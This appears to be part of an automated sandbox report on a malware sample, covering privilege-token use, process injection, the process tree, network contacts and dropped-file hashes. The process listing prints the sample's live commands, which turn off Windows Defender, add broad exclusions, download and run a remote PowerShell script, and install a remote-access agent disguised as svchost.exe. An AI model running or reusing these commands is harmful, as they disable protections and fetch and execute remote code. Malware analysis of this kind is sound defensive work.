N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3176 wrote to memory of 4456 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3176 wrote to memory of 4456 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3176 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3176 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4456 wrote to memory of 4444 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4456 wrote to memory of 4444 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4456 wrote to memory of 1864 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4456 wrote to memory of 1864 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3176 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe C:\Windows\system32\cmd.exe
PID 3176 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe C:\Windows\system32\cmd.exe
PID 2776 wrote to memory of 4544 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\install.exe
PID 2776 wrote to memory of 4544 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\install.exe
PID 2776 wrote to memory of 4544 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\install.exe
PID 4544 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\install.exe C:\Windows\SysWOW64\msiexec.exe
PID 4544 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\install.exe C:\Windows\SysWOW64\msiexec.exe
PID 4544 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\install.exe C:\Windows\SysWOW64\msiexec.exe
PID 4688 wrote to memory of 4300 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4688 wrote to memory of 4300 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4688 wrote to memory of 4300 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 660 wrote to memory of 4360 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 660 wrote to memory of 4360 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 660 wrote to memory of 4360 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 660 wrote to memory of 4360 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4360 wrote to memory of 4800 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4360 wrote to memory of 4800 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4360 wrote to memory of 4800 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4360 wrote to memory of 4800 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4800 wrote to memory of 720 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4800 wrote to memory of 720 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4800 wrote to memory of 3156 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Users\Admin\AppData\Local\svchost\svchost.exe
PID 4800 wrote to memory of 3156 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Users\Admin\AppData\Local\svchost\svchost.exe
PID 1048 wrote to memory of 3236 N/A C:\Users\Admin\AppData\Local\svchost\svchost.exe C:\Windows\System32\wbem\wmic.exe
PID 1048 wrote to memory of 3236 N/A C:\Users\Admin\AppData\Local\svchost\svchost.exe C:\Windows\System32\wbem\wmic.exe
PID 1048 wrote to memory of 3196 N/A C:\Users\Admin\AppData\Local\svchost\svchost.exe C:\Windows\system32\wbem\wmic.exe
PID 1048 wrote to memory of 3196 N/A C:\Users\Admin\AppData\Local\svchost\svchost.exe C:\Windows\system32\wbem\wmic.exe
PID 1048 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\svchost\svchost.exe C:\Windows\System32\wbem\wmic.exe
PID 1048 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\svchost\svchost.exe C:\Windows\System32\wbem\wmic.exe
PID 1048 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\svchost\svchost.exe C:\Windows\system32\wbem\wmic.exe
PID 1048 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\svchost\svchost.exe C:\Windows\system32\wbem\wmic.exe
PID 1048 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\svchost\svchost.exe C:\Windows\System32\wbem\wmic.exe
PID 1048 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\svchost\svchost.exe C:\Windows\System32\wbem\wmic.exe
PID 1048 wrote to memory of 3228 N/A C:\Users\Admin\AppData\Local\svchost\svchost.exe C:\Windows\System32\wbem\wmic.exe
PID 1048 wrote to memory of 3228 N/A C:\Users\Admin\AppData\Local\svchost\svchost.exe C:\Windows\System32\wbem\wmic.exe
PID 1048 wrote to memory of 4928 N/A C:\Users\Admin\AppData\Local\svchost\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1048 wrote to memory of 4928 N/A C:\Users\Admin\AppData\Local\svchost\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe

"C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive " Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableScriptScanning 1; Add-MpPreference -ExclusionPath 'C:\*' -Force; Add-MpPreference -ExclusionExtension '.exe' -Force; WMIC /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=\"C:\*\"; CiTool.exe -rp \"{PolicyId GUID}\" -json; powershell -nop -ExecutionPolicy Bypass -c \"Invoke-Command -ScriptBlock ([scriptblock]::Create([System.Text.Encoding]::UTF8.GetString((New-Object Net.WebClient).DownloadData('https://github.com/Idov31/MrKaplan/releases/download/V1.1.1/MrKaplan_Standalone.ps1')))) -ArgumentList @('begin')\" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -

C:\Windows\System32\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=C:\*

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ExecutionPolicy Bypass -c "Invoke-Command -ScriptBlock ([scriptblock]::Create([System.Text.Encoding]::UTF8.GetString((New-Object Net.WebClient).DownloadData('https://github.com/Idov31/MrKaplan/releases/download/V1.1.1/MrKaplan_Standalone.ps1')))) -ArgumentList @('begin')"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c install.exe

C:\Users\Admin\AppData\Local\Temp\install.exe

install.exe

C:\Windows\SysWOW64\msiexec.exe

msiexec.exe /i C:\Users\Admin\AppData\Local\Temp\MSIA921.tmp

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 7F46784FC526AC005796064DCFA2A3C7 C

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell "Add-MpPreference -ExclusionExtension '.exe' -Force"

C:\Users\Admin\AppData\Local\svchost\svchost.exe

C:\Users\Admin\AppData\Local\svchost\svchost.exe -install

C:\Users\Admin\AppData\Local\svchost\svchost.exe

"C:\Users\Admin\AppData\Local\svchost\svchost.exe" --meshServiceName="Microsoft"

C:\Windows\System32\wbem\wmic.exe

wmic SystemEnclosure get ChassisTypes

C:\Windows\system32\wbem\wmic.exe

wmic os get oslanguage /FORMAT:LIST

C:\Windows\System32\wbem\wmic.exe

wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"

C:\Windows\system32\wbem\wmic.exe

wmic os get oslanguage /FORMAT:LIST

C:\Windows\System32\wbem\wmic.exe

wmic SystemEnclosure get ChassisTypes

C:\Windows\System32\wbem\wmic.exe

wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -noprofile -nologo -command -

Network

Country Destination Domain Proto
US 8.8.8.8:53 api.logflare.app udp
US 104.21.55.56:443 api.logflare.app tcp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 66.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 56.55.21.104.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 sktelecom.netlify.app udp
DE 52.58.254.253:443 sktelecom.netlify.app tcp
US 8.8.8.8:53 253.254.58.52.in-addr.arpa udp
US 8.8.8.8:53 pub-fd29cd63fb8c4b7fb0c7d3fa893212b9.r2.dev udp
US 104.21.55.56:443 api.logflare.app tcp
US 162.159.140.237:443 pub-fd29cd63fb8c4b7fb0c7d3fa893212b9.r2.dev tcp
US 8.8.8.8:53 237.140.159.162.in-addr.arpa udp
DE 52.58.254.253:443 sktelecom.netlify.app tcp
US 162.159.140.237:443 pub-fd29cd63fb8c4b7fb0c7d3fa893212b9.r2.dev tcp
US 8.8.8.8:53 cdn.jsdelivr.net udp
US 104.21.55.56:443 api.logflare.app tcp
US 162.159.140.237:443 pub-fd29cd63fb8c4b7fb0c7d3fa893212b9.r2.dev tcp
US 104.21.55.56:443 api.logflare.app tcp
US 104.21.55.56:443 api.logflare.app tcp
US 151.101.193.229:443 cdn.jsdelivr.net tcp
US 8.8.8.8:53 229.193.101.151.in-addr.arpa udp
US 8.8.8.8:53 133.130.101.151.in-addr.arpa udp
US 8.8.8.8:53 telegra.ph udp
US 104.21.55.56:443 api.logflare.app tcp
US 104.21.55.56:443 api.logflare.app tcp
US 104.21.55.56:443 api.logflare.app tcp
NL 149.154.164.13:443 telegra.ph tcp
US 8.8.8.8:53 api.skt.cam udp
US 172.67.147.63:443 api.skt.cam tcp
US 8.8.8.8:53 microsoft.devq.workers.dev udp
US 8.8.8.8:53 13.164.154.149.in-addr.arpa udp
US 8.8.8.8:53 63.147.67.172.in-addr.arpa udp
US 104.21.61.174:443 microsoft.devq.workers.dev tcp
US 8.8.8.8:53 174.61.21.104.in-addr.arpa udp
US 8.8.8.8:53 sktelecom.duckdns.org udp
KR 203.234.238.140:443 sktelecom.duckdns.org tcp
US 8.8.8.8:53 140.238.234.203.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 98.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 70.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3kaw2vsn.qbq.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3176-6-0x00000000002B0000-0x0000000003A28000-memory.dmp

memory/4456-10-0x0000017664870000-0x0000017664892000-memory.dmp

memory/4456-22-0x00007FFC4ABE3000-0x00007FFC4ABE5000-memory.dmp

memory/4456-21-0x00000176626C0000-0x00000176626D0000-memory.dmp

memory/4456-20-0x00000176626C0000-0x00000176626D0000-memory.dmp

memory/660-23-0x00000228BD800000-0x00000228BD844000-memory.dmp

memory/660-24-0x00000228BFDE0000-0x00000228BFE56000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\install.exe

MD5 979ce82b2ea35a92fae6a60c6c3e3791
SHA1 8d260eea0151ee7a6aae88eb2e9015d5efb2603b
SHA256 be86cadf405e9f617601da44bab88f08b3e92ac4349a2616378a9195722925ca
SHA512 ec67c1d20ae0f9fffcf471d60f2ade6e08fd5a0e572ee1b58036ce11c5f353db93b622c795fe013a0dbe91fe4921b5ba50c312b8c51716d5cc4921d2050f2724

C:\Users\Admin\AppData\Local\Temp\MSIA921.tmp

MD5 6d9b5a3b75da266db5c237b0ac70b7f9
SHA1 9ce4aa208974b299ce0abeaf043740616f4f0b02
SHA256 d57614b838f083937ff98c161e55fa60b5d23de639818ad6eef8335ba23c031b
SHA512 fb458b1c2d3b9da748b1775b1bf2098fbe5076a0bc3daf2a93e1be978e3b7e34bc7a75c2660ef97cac3e7ba23ebceae1785dfe8ac124440f34dbd248cd92571d

C:\Users\Admin\AppData\Local\Temp\MSIAEAF.tmp

MD5 684f2d21637cb5835172edad55b6a8d9
SHA1 5eac3b8d0733aa11543248b769d7c30d2c53fcdb
SHA256 da1fe86141c446921021bb26b6fe2bd2d1bb51e3e614f46f8103ffad8042f2c0
SHA512 7b626c2839ac7df4dd764d52290da80f40f7c02cb70c8668a33ad166b0bcb0c1d4114d08a8754e0ae9c0210129ae7e885a90df714ca79bd946fbd8009848538c

memory/3176-49-0x00000000002B0000-0x0000000003A28000-memory.dmp

memory/4456-51-0x00000176626C0000-0x00000176626D0000-memory.dmp

memory/3176-52-0x00000000002B0000-0x0000000003A28000-memory.dmp

C:\Users\Admin\AppData\Local\svchost\svchost.exe

MD5 29304e42dc26d1276ca93a9c013599a4
SHA1 65437796133c2704d20757c99b768ffd915d1502
SHA256 83e75c4b57f3a255ec9efcdbda027a5b9577a993359c9a21946d5bec45924dd9
SHA512 fa0e66a941030fc9bde0b84e98645f04e3405fe76e539e214f1c1069661ca699e93d245a56fe37d4eec36fa13710bcc1b6c1373d9a0f9a0656ba233ee2aae8ca

C:\Users\Admin\AppData\Local\svchost\svchost.msh

MD5 90f91efb0b6cc632ea6b2bb3a6d5fb40
SHA1 e46a39e7252e086f34d64c3d720442cd325de506
SHA256 7db6fa16d92fa026ba88337e51623caea566a78eb275af77905286a533792fc9
SHA512 f511124b19a4f05e09f253f5f63e991694565247f9c09430368f53d5466ecb8822811107c7c0a9e91e8d1b0ff85bfa37a243b0635eb893c8fae39ea8152c3928